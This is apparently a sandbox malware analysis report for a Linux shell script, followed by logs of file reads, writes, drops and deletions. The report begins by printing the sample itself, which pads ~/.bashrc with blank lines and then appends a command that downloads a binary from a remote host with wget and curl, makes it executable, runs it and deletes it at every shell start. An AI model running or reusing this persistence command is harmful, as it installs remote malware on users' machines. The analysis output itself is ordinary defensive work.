~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo " " >> ~/.bashrc echo "cd /tmp; wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0; curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0; chmod +x m3cr0; ./m3cr0; rm -rf m3cr0; rm -rf m3cr0.1; cd ~" >> ~/.bashrc
Usage
Processing ( 18.93 seconds )
- 18.008 CAPE
- 0.583 Heatmap
- 0.179 StraceAnalysis
- 0.143 TraceeAnalysis
- 0.011 AnalysisInfo
- 0.002 NetworkAnalysis
Signatures ( 0.00 seconds )
Reporting ( 2.69 seconds )
- 2.635 MITRE_TTPS
- 0.046 ReportHTML
- 0.007 JsonDump
- 0.006 LiteReport
Signatures
Reads files from disk
ReadFile: /lib/x86_64-linux-gnu/libc.so.6
ReadFile: /lib/x86_64-linux-gnu/libtinfo.so.6
ReadFile: /tmp/0076fe37f41ee52f12cf7.sh
ReadFile: /lib/x86_64-linux-gnu/libpcre2-8.so.0
ReadFile: /lib/x86_64-linux-gnu/libuuid.so.1
ReadFile: /lib/x86_64-linux-gnu/libidn2.so.0
ReadFile: /lib/x86_64-linux-gnu/libssl.so.3
ReadFile: /lib/x86_64-linux-gnu/libcrypto.so.3
ReadFile: /lib/x86_64-linux-gnu/libz.so.1
ReadFile: /lib/x86_64-linux-gnu/libpsl.so.5
ReadFile: /lib/x86_64-linux-gnu/libunistring.so.2
ReadFile: /etc/wgetrc
ReadFile: /etc/localtime
ReadFile: /usr/share/locale/locale.alias
ReadFile: /etc/nsswitch.conf
ReadFile: /etc/host.conf
ReadFile: /etc/resolv.conf
ReadFile: /etc/hosts
ReadFile: /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
ReadFile: /lib/x86_64-linux-gnu/libcurl.so.4
ReadFile: /lib/x86_64-linux-gnu/libnghttp2.so.14
ReadFile: /lib/x86_64-linux-gnu/librtmp.so.1
ReadFile: /lib/x86_64-linux-gnu/libssh.so.4
ReadFile: /lib/x86_64-linux-gnu/libgssapi_krb5.so.2
ReadFile: /lib/x86_64-linux-gnu/libldap-2.5.so.0
ReadFile: /lib/x86_64-linux-gnu/liblber-2.5.so.0
ReadFile: /lib/x86_64-linux-gnu/libzstd.so.1
ReadFile: /lib/x86_64-linux-gnu/libbrotlidec.so.1
ReadFile: /lib/x86_64-linux-gnu/libgnutls.so.30
ReadFile: /lib/x86_64-linux-gnu/libhogweed.so.6
ReadFile: /lib/x86_64-linux-gnu/libnettle.so.8
ReadFile: /lib/x86_64-linux-gnu/libgmp.so.10
ReadFile: /lib/x86_64-linux-gnu/libkrb5.so.3
ReadFile: /lib/x86_64-linux-gnu/libk5crypto.so.3
ReadFile: /lib/x86_64-linux-gnu/libcom_err.so.2
ReadFile: /lib/x86_64-linux-gnu/libkrb5support.so.0
ReadFile: /lib/x86_64-linux-gnu/libsasl2.so.2
ReadFile: /lib/x86_64-linux-gnu/libbrotlicommon.so.1
ReadFile: /lib/x86_64-linux-gnu/libp11-kit.so.0
ReadFile: /lib/x86_64-linux-gnu/libtasn1.so.6
ReadFile: /lib/x86_64-linux-gnu/libkeyutils.so.1
ReadFile: /lib/x86_64-linux-gnu/libresolv.so.2
ReadFile: /lib/x86_64-linux-gnu/libffi.so.8
ReadFile: /usr/lib/ssl/openssl.cnf
ReadFile: /etc/passwd
ReadFile: ./m3cr0
ReadFile: ./zigaarch64
ReadFile: ./x00x
ReadFile: /usr/lib/locale/locale-archive
ReadFile: /root/.bashrc
Drops files onto disk
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: /root/.bashrc
DroppedFile: m3cr0
DroppedFile: zigaarch64
DroppedFile: x00x
Writes to files on disk
WriteFile: STDERR
Deletes files from disk
DeletedFile: "m3cr0"
DeletedFile: "m3cr0"
DeletedFile: "zigaarch64"
DeletedFile: "zigaarch64"
DeletedFile: "x00x"
DeletedFile: "x00x"
Screenshots
No screenshots available.Session Playback
No playback available.
Hosts
No hosts contacted.
DNS
No domains contacted.
Summary
Sorry! No behavior.
Sorry! No tracee.
Sorry! No strace.
Sorry! No tracee.
No hosts contacted.
No TCP connections recorded.
No UDP connections recorded.
No domains contacted.
HTTP Requests
No HTTP(s) requests performed.
SMTP traffic
No SMTP traffic performed.
IRC traffic
No IRC requests performed.
No ICMP traffic performed.
CIF Results
No CIF Results
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Suricata HTTP
No Suricata HTTP
Sorry! No Suricata Extracted files.
Sorry! No dropped files.
Sorry! No process dumps.